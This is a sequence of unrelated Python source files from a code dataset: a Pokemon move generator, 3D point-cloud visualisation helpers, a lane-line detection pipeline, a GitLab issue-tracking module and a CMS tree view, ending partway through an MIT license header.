pokemon_moves\n\t\t>>> pokemon_moves.Generate(\"DOUBLE EDGE\")\n\n\t\tProps(\n\t\t\tELEMENT_TYPE='NORMAL', \n\t\t\tATTRIBUTES=Props(\n\t\t\t\tGHOST=GhostTypeMeta(\n\t\t\t\t\tEFFECT='NO_EFFECT', \n\t\t\t\t\tSUM=0), \n\t\t\t...), \n\t\t\tCATEGORY='Physical', \n\t\t\tPOWER=120, \n\t\t\tACCURACY=100, \n\t\t\tPOWER_POINTS=15, \n\t\t\tDESCRIPTION='User receives recoil damage.')\n\t\t\"\"\"\n\n\t\t# Named arguments #\n\n\t\t# @parameter: , @type: , @required: \n\t\t# @description: Pokemon move class type to generate.\n\n\t\t# set pokemon type argument as string and uppercase for comparisons and collections.\n\t\tpokemon_move = str.upper(str(pokemon_move))\n\n\t\t# set substring substitution on whitespaces.\n\t\tpokemon_move = re.sub(r'\\s', '_', pokemon_move)\n\n\t\t# confirm pokemon move is defined move otherwise select move at random.\n\t\tpokemon_move = pokemon_move if pokemon_move in MOVE_NAMES else random.choice(MOVE_NAMES)\n\n\t\t# return: @type: @class.__main__.Generate\n\t\treturn super(Generate, self).__new__(self, **MOVE_SET[pokemon_move])\n\n######################\n### Module exports ###\n######################\n\n\"\"\"Generate constants from defined properties. Overwrites previous properties.\n\nComposed to consume existing declerations.\n\"\"\"\n\nfor i in range(0, len(MOVE_NAMES)):\n\t\"\"\"Set module properties. Sets package variable using defined names in move sets.\"\"\"\n\tsetattr(sys.modules[__name__], MOVE_NAMES[i], Generate(MOVE_NAMES[i]))","sub_path":"temp/pokemon_moves.py","file_name":"pokemon_moves.py","file_ext":"py","file_size_in_byte":45397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"21697381","text":"import k3d\nimport numpy as np\nimport trimesh\n\n\ndef visualize_pointcloud(point_cloud, point_size=0.05, colors=None, flip_axes=False, name='point_cloud'):\n plot = k3d.plot(name=name, grid_visible=False)\n if flip_axes:\n point_cloud[:, 2] = point_cloud[:, 2] * -1\n point_cloud[:, [0, 1, 2]] = point_cloud[:, [0, 2, 1]]\n plt_points = k3d.points(positions=point_cloud.astype(np.float32), point_size=point_size, colors=colors if colors is not None else [], color=0xd0d0d0)\n plot += plt_points\n plt_points.shader = '3d'\n return plot.display()\n\n\ndef visualize_mesh(mesh, flip_axes=False):\n vertices = mesh.vertices\n faces = mesh.faces\n plot = k3d.plot(name='points', grid_visible=False, grid=(-0.55, -0.55, -0.55, 0.55, 0.55, 0.55))\n if flip_axes:\n vertices[:, 2] = vertices[:, 2] * -1\n vertices[:, [0, 1, 2]] = vertices[:, [0, 2, 1]]\n plt_mesh = k3d.mesh(vertices.astype(np.float32), faces.astype(np.uint32), color=0xd0d0d0)\n plot += plt_mesh\n plt_mesh.shader = '3d'\n plot.display()","sub_path":"util/visualization_utils.py","file_name":"visualization_utils.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"335821982","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\nfrom moviepy.editor import VideoFileClip\nimport glob\n\n# Define a class to receive the characteristics of each line detection\n\n\nclass Line():\n def __init__(self):\n # was the line detected in the last iteration?\n self.detected = False\n # x values of the last n fits of the line\n self.recent_xfitted = []\n # average x values of the fitted line over the last n iterations\n self.bestx = None\n # polynomial coefficients averaged over the last n iterations\n self.best_fit = None\n # polynomial coefficients for the most recent fit\n self.current_fit = [np.array([False])]\n # radius of curvature of the line in some units\n self.radius_of_curvature = None\n # distance in meters of vehicle center from the line\n self.line_base_pos = None\n # difference in fit coefficients between last and new fits\n self.diffs = np.array([0, 0, 0], dtype='float')\n # x values for detected line pixels\n self.allx = None\n # y values for detected line pixels\n self.ally = None\n\n\ndef fit_poly(img_shape, leftx, lefty, rightx, righty):\n ### TO-DO: Fit a second order polynomial to each with np.polyfit() ###\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n # Generate x and y values for plotting\n ploty = np.linspace(0, img_shape[0]-1, img_shape[0])\n ### TO-DO: Calc both polynomials using ploty, left_fit and right_fit ###\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n\n return left_fit, right_fit, left_fitx, right_fitx, ploty\n\n\ndef search_around_poly(binary_warped, left_fit, right_fit):\n # HYPERPARAMETER\n # Choose the width of the margin around the previous polynomial to search\n # The quiz grader expects 100 here, but feel free to tune on your own!\n margin = 100\n # Define conversions in x and y from pixels space to meters\n ym_per_pix = 30/720 # meters per pixel in y dimension\n xm_per_pix = 3.7/700 # meters per pixel in x dimension\n\n # Grab activated pixels\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n\n ### TO-DO: Set the area of search based on activated x-values ###\n ### within the +/- margin of our polynomial function ###\n ### Hint: consider the window areas for the similarly named variables ###\n ### in the previous quiz, but change the windows to our new search area ###\n left_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy +\n left_fit[2] - margin)) & (nonzerox < (left_fit[0]*(nonzeroy**2) +\n left_fit[1]*nonzeroy + left_fit[2] + margin)))\n right_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy +\n right_fit[2] - margin)) & (nonzerox < (right_fit[0]*(nonzeroy**2) +\n right_fit[1]*nonzeroy + right_fit[2] + margin)))\n\n # Again, extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n\n # Fit new polynomials\n left_fit, right_fit, left_fitx, right_fitx, ploty = fit_poly(\n binary_warped.shape, leftx, lefty, rightx, righty)\n # Fit new polynomials (in the real world)\n left_fit_cr, right_fit_cr, left_fitx_cr, right_fitx_cr, ploty_cr = fit_poly(\n binary_warped.shape, leftx * xm_per_pix, lefty * ym_per_pix, rightx * xm_per_pix, righty * ym_per_pix)\n\n # Define y-value where we want radius of curvature\n # We'll choose the maximum y-value, corresponding to the bottom of the image\n y_eval = np.max(ploty)\n\n # Calculation of R_curve (radius of curvature)\n left_curverad = (\n (1 + (2*left_fit[0]*y_eval + left_fit[1])**2)**1.5) / np.absolute(2*left_fit[0])\n right_curverad = (\n (1 + (2*right_fit[0]*y_eval + right_fit[1])**2)**1.5) / np.absolute(2*right_fit[0])\n # Calculation of R_curve (radius of curvature in the real world)\n left_curverad_real = (\n (1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])\n right_curverad_real = (\n (1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])\n\n ## Visualization ##\n # Create an image to draw on and an image to show the selection window\n out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n window_img = np.zeros_like(out_img)\n # Color in left and right line pixels\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n # Generate a polygon to illustrate the search window area\n # And recast the x and y points into usable format for cv2.fillPoly()\n left_line_window1 = np.array(\n [np.transpose(np.vstack([left_fitx-margin, ploty]))])\n left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx+margin,\n ploty])))])\n left_line_pts = np.hstack((left_line_window1, left_line_window2))\n right_line_window1 = np.array(\n [np.transpose(np.vstack([right_fitx-margin, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx+margin,\n ploty])))])\n right_line_pts = np.hstack((right_line_window1, right_line_window2))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))\n cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))\n result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n\n # Plot the polynomial lines onto the image\n plt.plot(left_fitx, ploty, color='yellow')\n plt.plot(right_fitx, ploty, color='yellow')\n ## End visualization steps ##\n\n return result, left_curverad, right_curverad, left_curverad_real, right_curverad_real, left_fit, right_fit\n\n\ndef binary_warped_generate(image):\n c_b, thresholded_binary = pipeline(\n image, s_thresh=(90, 255), sx_thresh=(20, 100))\n warped_thresholded_binary = warp(thresholded_binary)\n return warped_thresholded_binary\n\n\ndef warp(img):\n img_size = (img.shape[1], img.shape[0])\n\n # Four source coordinate\n src = np.float32([[593, 450], [690, 450], [200, 720], [1120, 720]])\n\n # Four desired coordinates\n dst = np.float32([[200, 0],\t[1000, 0], [200, 720], [1000, 720]])\n\n # Compute the perspective transform, M\n M = cv2.getPerspectiveTransform(src, dst)\n\n # Could compute the inverse also by swapping the input parameters\n Minv = cv2.getPerspectiveTransform(dst, src)\n\n # Create warped image - use linear interpolation\n warped = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)\n\n return warped, M, Minv\n\n\ndef hls_thresh(img, channel='s', thresh=(0, 255)):\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n if channel == 'h':\n channel = hls[:, :, 0]\n elif channel == 'l':\n channel = hls[:, :, 1]\n else:\n channel = hls[:, :, 2]\n binary_output = np.zeros_like(channel)\n binary_output[(channel > thresh[0]) & (channel <= thresh[1])] = 1\n return binary_output\n\n\ndef lab_thresh(img, channel='l', thresh=(0, 255)):\n lab = cv2.cvtColor(img, cv2.COLOR_RGB2LAB)\n if channel == 'l':\n channel = lab[:, :, 0]\n elif channel == 'a':\n channel = lab[:, :, 1]\n else:\n channel = lab[:, :, 2]\n binary_output = np.zeros_like(channel)\n binary_output[(channel > thresh[0]) & (channel <= thresh[1])] = 1\n return binary_output\n\n\ndef luv_thresh(img, channel='l', thresh=(0, 255)):\n luv = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n if channel == 'l':\n channel = luv[:, :, 0]\n elif channel == 'u':\n channel = luv[:, :, 1]\n else:\n channel = luv[:, :, 2]\n binary_output = np.zeros_like(channel)\n binary_output[(channel > thresh[0]) & (channel <= thresh[1])] = 1\n return binary_output\n\n\ndef rgb_thresh(img, channel='r', thresh=(0, 255)):\n rgb = img\n if channel == 'r':\n channel = rgb[:, :, 0]\n elif channel == 'g':\n channel = rgb[:, :, 1]\n else:\n channel = rgb[:, :, 2]\n binary_output = np.zeros_like(channel)\n binary_output[(channel > thresh[0]) & (channel <= thresh[1])] = 1\n return binary_output\n\n\n# Edit this function to create your own pipeline.\ndef pipeline(img, lab_b_thresh=(145, 200), luv_l_thresh=(215, 255)):\n img = np.copy(img)\n binary_output_1 = lab_thresh(img, channel='b', thresh=lab_b_thresh)\n binary_output_2 = luv_thresh(img, channel='l', thresh=luv_l_thresh)\n\n binary_output = np.zeros_like(binary_output_1)\n binary_output[(binary_output_1 == 1) | (binary_output_2 == 1)] = 1\n\n # Stack each channel\n color_binary = np.dstack(\n (binary_output_1, binary_output_2, np.zeros_like(binary_output_2))) * 255\n\n return color_binary, binary_output\n\n\ndef find_lane_pixels(binary_warped):\n '''\n 在二进制,经过Transform的图片中,寻找左右两条车道线的所有的pixels\n 返回所有的pixels,返回带有滑动窗口的图片\n '''\n # Take a histogram of the bottom half of the image\n histogram = np.sum(binary_warped[binary_warped.shape[0]//2:, :], axis=0)\n # Create an output image to draw on and visualize the result\n out_img = np.dstack((binary_warped, binary_warped, binary_warped))\n # Find the peak of the left and right halves of the histogram\n # These will be the starting point for the left and right lines\n midpoint = np.int(histogram.shape[0]//2)\n leftx_base = np.argmax(histogram[:midpoint])\n rightx_base = np.argmax(histogram[midpoint:]) + midpoint\n\n # HYPERPARAMETERS\n # Choose the number of sliding windows\n nwindows = 9\n # Set the width of the windows +/- margin\n margin = 100\n # Set minimum number of pixels found to recenter window\n minpix = 50\n\n # Set height of windows - based on nwindows above and image shape\n window_height = np.int(binary_warped.shape[0]//nwindows)\n # Identify the x and y positions of all nonzero pixels in the image\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Current positions to be updated later for each window in nwindows\n leftx_current = leftx_base\n rightx_current = rightx_base\n\n # Create empty lists to receive left and right lane pixel indices\n left_lane_inds = []\n right_lane_inds = []\n\n # Step through the windows one by one\n for window in range(nwindows):\n # Identify window boundaries in x and y (and right and left)\n win_y_low = binary_warped.shape[0] - (window+1)*window_height\n win_y_high = binary_warped.shape[0] - window*window_height\n win_xleft_low = leftx_current - margin\n win_xleft_high = leftx_current + margin\n win_xright_low = rightx_current - margin\n win_xright_high = rightx_current + margin\n\n # Draw the windows on the visualization image\n cv2.rectangle(out_img, (win_xleft_low, win_y_low),\n (win_xleft_high, win_y_high), (0, 255, 0), 2)\n cv2.rectangle(out_img, (win_xright_low, win_y_low),\n (win_xright_high, win_y_high), (0, 255, 0), 2)\n\n # Identify the nonzero pixels in x and y within the window #\n good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n (nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]\n\n # Append these indices to the lists\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n\n # If you found > minpix pixels, recenter next window on their mean position\n if len(good_left_inds) > minpix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n if len(good_right_inds) > minpix:\n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n\n # Concatenate the arrays of indices (previously was a list of lists of pixels)\n try:\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n except ValueError:\n # Avoids an error if the above is not implemented fully\n pass\n\n # Extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n\n return leftx, lefty, rightx, righty, out_img\n\n\ndef fit_polynomial(binary_warped):\n '''\n 在二进制图片中,拟合出两条车道线的位置。并且用两条黄色的线绘制在图片中\n '''\n # Find our lane pixels first\n leftx, lefty, rightx, righty, out_img = find_lane_pixels(binary_warped)\n\n # Fit a second order polynomial to each using `np.polyfit`\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n\n # Generate x and y values for plotting\n ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0])\n try:\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n except TypeError:\n # Avoids an error if `left` and `right_fit` are still none or incorrect\n print('The function failed to fit a line!')\n left_fitx = 1*ploty**2 + 1*ploty\n right_fitx = 1*ploty**2 + 1*ploty\n\n ## Visualization ##\n # Colors in the left and right lane regions\n out_img[lefty, leftx] = [255, 0, 0]\n out_img[righty, rightx] = [0, 0, 255]\n\n # Plots the left and right polynomials on the lane lines\n plt.plot(left_fitx, ploty, color='yellow')\n plt.plot(right_fitx, ploty, color='yellow')\n\n return out_img, left_fit, right_fit\n\n\ndef calibration_params_cal():\n '''\n 用'camera_cal'中的图片,校准相机,得到校准相机用的坐标点\n '''\n # Read in adn make a list of calibration images\n images = glob.glob('./camera_cal/calibration*.jpg')\n\n # Arrays to store object points and image points from all the images\n objpoints = []\n imgpoints = []\n\n # Prepare object points\n objp = np.zeros((6*9, 3), np.float32)\n objp[:, :2] = np.mgrid[0:9, 0:6].T.reshape(-1, 2)\n\n for fname in images:\n # Read in each image\n img = mpimg.imread(fname)\n\n # Convert image to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (9, 6), None)\n\n # If corners are found, add object points, image points\n if ret == True:\n imgpoints.append(corners)\n objpoints.append(objp)\n\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, (9, 6), corners, ret)\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(\n objpoints, imgpoints, img.shape[1:], None, None)\n\n return ret, mtx, dist, rvecs, tvecs\n\n\ndef undistort_image(img, mtx, dist):\n undist = cv2.undistort(img, mtx, dist, None, mtx)\n return undist\n\n\ndef image_process(input_image, output_image, mtx, dist):\n left_fit = Line()\n right_fit = Line()\n\n # Define conversions in x and y from pixels space to meters\n ym_per_pix = 30/720 # meters per pixel in y dimension\n xm_per_pix = 3.7/700 # meters per pixel in x dimension\n\n left_fit.current_fit = np.array([0.0, 0.0, 300.0])\n right_fit.current_fit = np.array([0.0, 0.0, 900.0])\n\n image = mpimg.imread(input_image)\n # input_clip = VideoFileClip(input_video).set_duration(3.0)\n\n def process_image(image):\n\n # Step 1: Undistort each frame\n img = undistort_image(image, mtx, dist)\n\n # Step 2: Convert each frame into a binary image, which can display lane lines clearly,\n # using the HLS and gradient threshold together\n\n color_binary, thresholded_binary = pipeline(image, lab_b_thresh=(145, 200), luv_l_thresh=(215, 255))\n\n # Step 3: Convert the image into a top-down view for calculate the curve and fitpoly\n warped_thresholded_binary, M, Minv = warp(thresholded_binary)\n\n # Step 4: Find the lane lines\n # out_img, left_fit.current_fit, right_fit.current_fit = fit_polynomial(warped_thresholded_binary)\n result, left_curverad, right_curverad, left_curverad_real, right_curverad_real, left_fit.current_fit, right_fit.current_fit = search_around_poly(\n warped_thresholded_binary, left_fit=left_fit.current_fit, right_fit=right_fit.current_fit)\n\n left_fit.radius_of_curvature = left_curverad_real\n right_fit.radius_of_curvature = right_curverad_real\n\n # Step 5: Display the lane lines on the image\n yMax = img.shape[0]\n ploty = np.linspace(0, yMax - 1, yMax)\n color_warp = np.zeros_like(img).astype(np.uint8)\n\n # Step 5.1: Calculate points.\n left_fitx = left_fit.current_fit[0]*ploty**2 + \\\n left_fit.current_fit[1]*ploty + left_fit.current_fit[2]\n right_fitx = right_fit.current_fit[0]*ploty**2 + \\\n right_fit.current_fit[1]*ploty + right_fit.current_fit[2]\n\n # Step 5.2: Recast the x and y points into usable format for cv2.fillPoly()\n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array(\n [np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pts = np.hstack((pts_left, pts_right))\n\n # Step 5.3: Draw the lane onto the warped blank image\n cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))\n\n # Step 5.4: Warp the blank back to original image space using inverse perspective matrix (Minv)\n newwarp = cv2.warpPerspective(\n color_warp, Minv, (img.shape[1], img.shape[0]))\n result = cv2.addWeighted(img, 1, newwarp, 0.3, 0)\n\n # Step 6: Display the lane lines info on the image\n left_curve_base = left_fit.current_fit[0] * image.shape[0] ** 2 + \\\n left_fit.current_fit[1] * image.shape[0] + left_fit.current_fit[2]\n right_curve_base = right_fit.current_fit[0] * image.shape[0] ** 2 + \\\n right_fit.current_fit[1] * \\\n image.shape[0] + right_fit.current_fit[2]\n car_offset = ((left_curve_base + right_curve_base) /\n 2 - image.shape[1] / 2) * xm_per_pix\n text1 = \"Curvature radius (left, right) = (\" + str(\n left_fit.radius_of_curvature) + \"m, \" + str(right_fit.radius_of_curvature) + \"m)\"\n text2 = \"Car offset = \" + str(car_offset) + \"m\"\n cv2.putText(result, text1, (40, 50),\n cv2.FONT_HERSHEY_PLAIN, 2.0, (0, 0, 255), 2)\n cv2.putText(result, text2, (40, 100),\n cv2.FONT_HERSHEY_PLAIN, 2.0, (0, 0, 255), 2)\n\n # Step 7: Return the processed image\n return result\n\n \n result = process_image(image)\n result = cv2.cvtColor(result, cv2.COLOR_RGB2BGR)\n cv2.imwrite(output_image, result)\n\nif __name__ == \"__main__\":\n\n # Step 1: Calibrate the camera, get the calibration params\n ret, mtx, dist, rvecs, tvecs = calibration_params_cal()\n\n # Step 2: Processing the video frame by frame\n input_image = './test_images/test2.jpg'\n output_image = './output_images/lane_area_add_on_original_image.jpg'\n image_process(input_image, output_image, mtx, dist)\n # # Read an image\n","sub_path":"carND-LaneLines-P2-resubmit-part-3.py","file_name":"carND-LaneLines-P2-resubmit-part-3.py","file_ext":"py","file_size_in_byte":20332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"516785591","text":"\"\"\"\nCode for interacting with a gitlab instance.\n\"\"\"\nimport yaml\nimport time\n\nfrom .event import Event\nfrom . import config\nimport gitlab\n\nimport re\nimport datetime\n\nfrom liquid import Liquid\n\nSTATE_PREFIX = \"C01\"\n\ndef find_events(repository, milestone=None, subset=None, update=False, repo=True, label=None):\n \"\"\"\n Search through a repository's issues and find all of the ones\n for events.\n \"\"\"\n if subset == [None]:\n subset = None\n if not label:\n event_label = config.get(\"gitlab\", \"event_label\")\n else:\n event_label = label\n try:\n sleep_time = int(config.get(\"gitlab\", \"rest_time\"))\n except:\n sleep_time = 30\n issues = repository.issues.list(labels=[event_label], \n #milestone=milestone,\n per_page=1000)\n output = []\n if subset:\n for issue in issues:\n if issue.title in subset:\n output += [EventIssue(issue, repository, update, repo=repo)]\n if update:\n time.sleep(sleep_time)\n else:\n for issue in issues:\n output += [EventIssue(issue, repository, update, repo=repo)]\n if update:\n time.sleep(sleep_time)\n return output\n\n\nclass EventIssue:\n \"\"\"\n Use an issue on the gitlab issue tracker to \n hold variable data for the program.\n\n Parameters\n ----------\n issue : `gitlab.issue`\n The issue which represents the event.\n update : bool\n Flag to determine if the git repository is updated \n when it is loaded. Defaults to False to prevent\n excessive load on the git server.\n \"\"\"\n\n def __init__(self, issue, repository, update=False, repo=True):\n\n self.issue_object = issue\n self.title = issue.title\n self.text = issue.description\n \n self.issue_id = issue.id\n self.labels = issue.labels\n self.data = self.parse_notes()\n if repo:\n self.repository = repository\n else:\n self.repository = None\n self.event_object=None\n self.event_object = Event.from_issue(self, update, repo=repo)\n \n\n def _refresh(self):\n if self.repository:\n self.issue_object = self.repository.issues.get(self.issue_object.iid)\n if self.event_object:\n self.event_object.text = self.issue_object.description.split(\"---\")\n else:\n pass\n\n @classmethod\n def create_issue(cls, repository, event_object, issue_template=None):\n \"\"\"\n Create an issue for an event.\n \"\"\"\n\n if issue_template:\n with open(issue_template, \"r\") as template_file:\n liq = Liquid(template_file.read())\n rendered = liq.render(event_object=event_object, yaml = event_object.to_yaml())\n else:\n rendered = event_object.to_yaml()\n \n repository.issues.create({'title': event_object.name,\n 'description': rendered})\n \n @property\n def productions(self):\n \"\"\"List the productions on this event.\"\"\"\n return self.event_object.productions\n \n @property\n def state(self):\n \"\"\"\n Get the state of the event's runs.\n \"\"\"\n for label in self.issue_object.labels:\n if f\"{STATE_PREFIX}::\" in label:\n return label[len(STATE_PREFIX)+2:]\n return None\n\n @state.setter\n def state(self, state):\n \"\"\"\n Set the event state.\n \"\"\"\n self._refresh()\n for label in self.issue_object.labels:\n if f\"{STATE_PREFIX}::\" in label:\n # Need to remove all of the other scoped labels first.\n self.issue_object.labels.remove(label)\n self.issue_object.labels += [\"{}::{}\".format(STATE_PREFIX, state)]\n self.issue_object.save()\n\n def add_note(self, text):\n \"\"\"\n Add a comment to the event issue.\n A footer will be added to identify this as being created by the \n supervisor and not the user.\n \"\"\"\n self._refresh()\n now = datetime.datetime.now()\n header = \"\"\"\"\"\"\n footer = f\"\"\"\\nAdded at {now:%H}:{now:%M}, {now:%Y}-{now:%m}-{now:%d} by the run supervision robot :robot:.\"\"\"\n self.issue_object.notes.create({\"body\": header+text+footer})\n self.issue_object.save()\n\n def add_label(self, label, state=True):\n \"\"\"\n Add a new label to an event issue.\n\n Parameters\n ----------\n label : str \n The name of the label.\n \"\"\"\n self._refresh()\n if state:\n self.issue_object.labels += [f\"{STATE_PREFIX}:{label}\"]\n else:\n self.issue_object.labels += [f\"{label}\"]\n \n self.issue_object.save()\n \n def update_data(self):\n \"\"\"\n Store event data in the comments on the event repository.\n \"\"\"\n self._refresh()\n\n self.issue_object.description = self.event_object.to_issue()\n\n self.issue_object.save()\n\n def parse_notes(self):\n \"\"\"\n Read issue information from the comments on the issue.\n\n Only notes which start\n ```\n # Run information\n ```\n will be parsed.\n \"\"\"\n data = {}\n keyval = r\"([\\w]+):[\\s]*([ \\w\\#\\/\\,\\.-]+)\"\n notes = self.issue_object.notes.list(per_page=200)\n note_data = []\n for note in reversed(notes):\n if \"---\\n\" in note.body:\n data = note.body.split(\"---\")\n if len(data)>0: \n data=data[1]\n else: \n continue\n data = yaml.safe_load(data)\n note_data.append(data)\n return note_data\n","sub_path":"asimov/gitlab.py","file_name":"gitlab.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"556215346","text":"# Copyright (c) 2010 gocept gmbh & co. kg\n# See also LICENSE.txt\n\nimport StringIO\nimport asm.cms.edition\nimport asm.cmsui.interfaces\nimport cgi\nimport grok\nimport zope.component\nimport zope.copypastemove.interfaces\n\nBRANCH_STATE_CLOSED = False\nBRANCH_STATE_OPEN = True\n# We don't have any children.\nBRANCH_STATE_NONE = None\n\nclass Tree(grok.View):\n\n grok.context(grok.Application) # XXX Meh.\n grok.layer(asm.cmsui.interfaces.ICMSSkin)\n grok.require('asm.cms.EditContent')\n\n parent = None\n open_page = None\n\n def update(self, parent_id=None, page_id=None):\n self.request.response.setHeader('Content-Type', 'text/xml')\n if parent_id is None:\n self.parent = self.context\n else:\n iids = zope.component.getUtility(zope.intid.interfaces.IIntIds)\n self.parent = iids.getObject(int(parent_id))\n\n # Page ID is used to give enough data in initial tree that the branch\n # that has currently open page is also transmitted in the initial\n # data request.\n #\n # On subsequent calls when opening branches, page_id is not transmitted\n # any more and parent_id is transmitted instead.\n if page_id is not None:\n iids = zope.component.getUtility(zope.intid.interfaces.IIntIds)\n page = iids.getObject(int(page_id))\n self.open_page = page\n\n\n def _get_page_data(self, page):\n intids = zope.component.getUtility(zope.intid.IIntIds)\n edition = asm.cms.edition.select_edition(page, self.request)\n\n if isinstance(edition, asm.cms.edition.NullEdition):\n ref = page\n title = page.__name__\n else:\n ref = edition\n title = edition.title\n\n page_id = intids.getId(page)\n if title is None:\n title = u''\n\n state = BRANCH_STATE_NONE\n if len(list(page.subpages)) > 0:\n state = BRANCH_STATE_CLOSED\n\n parent_id = None\n if page != self.context:\n parent_id = intids.getId(page.__parent__)\n\n return {\n 'rel': page.type,\n 'id': page_id,\n 'parent_id': parent_id,\n 'state': state,\n 'url': self.url(ref),\n 'title': title,\n 'name': page.__name__,\n }\n\n def _page_to_xml(self, page):\n parent_str = \"\"\n if page['parent_id'] is not None:\n parent_str = 'parent_id=\"%s\"' % page['parent_id']\n\n state_str = \"\"\n if page['state'] is not BRANCH_STATE_NONE:\n if page['state'] == BRANCH_STATE_OPEN:\n state_str = 'state=\"open\"'\n elif page['state'] == BRANCH_STATE_CLOSED:\n state_str = 'state=\"closed\"'\n\n return \"\"\"\n%(title)s\n\n\"\"\" % {'rel': page['rel'],\n 'parent_str': parent_str,\n 'id': page['id'],\n 'state_str': state_str,\n 'url': page['url'],\n 'title': cgi.escape(page['title']),\n 'name': cgi.escape(page['name']),\n }\n\n def _sub_pages(self, parent):\n pages = []\n for sub in parent.subpages:\n pages.append(self._get_page_data(sub))\n return pages\n\n def _open_branches_leading_to_open_page(self, pages):\n open_page = self.open_page\n if open_page is None:\n return pages\n\n intids = zope.component.getUtility(zope.intid.IIntIds)\n opened_ids = []\n while self.context != open_page:\n pages.extend(self._sub_pages(open_page))\n open_page = open_page.__parent__\n opened_ids.append(intids.getId(open_page))\n\n for page in pages:\n if page['id'] in opened_ids:\n page['state'] = BRANCH_STATE_OPEN\n\n return pages\n\n\n def tree(self):\n pages = []\n # When we are opening the tree for the first time, we don't have\n # anything in tree and we need to add the root node specifically.\n if self.parent == self.context:\n pages = [self._get_page_data(self.parent)]\n pages.extend(self._sub_pages(self.parent))\n\n pages = self._open_branches_leading_to_open_page(pages)\n\n result = StringIO.StringIO()\n result.write(\"\\n\")\n for page in pages:\n result.write(self._page_to_xml(page))\n result.write(\"\\n\")\n return result.getvalue()\n","sub_path":"src/asm/cmsui/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"643425771","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nffi.py\n\nCreated by Stephan Hügel on 2016-08-3\n\nThis file is part of rdp.\n\nThe MIT License (MIT)\n\nCopyright (c) 2016 Stephan Hügel\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES 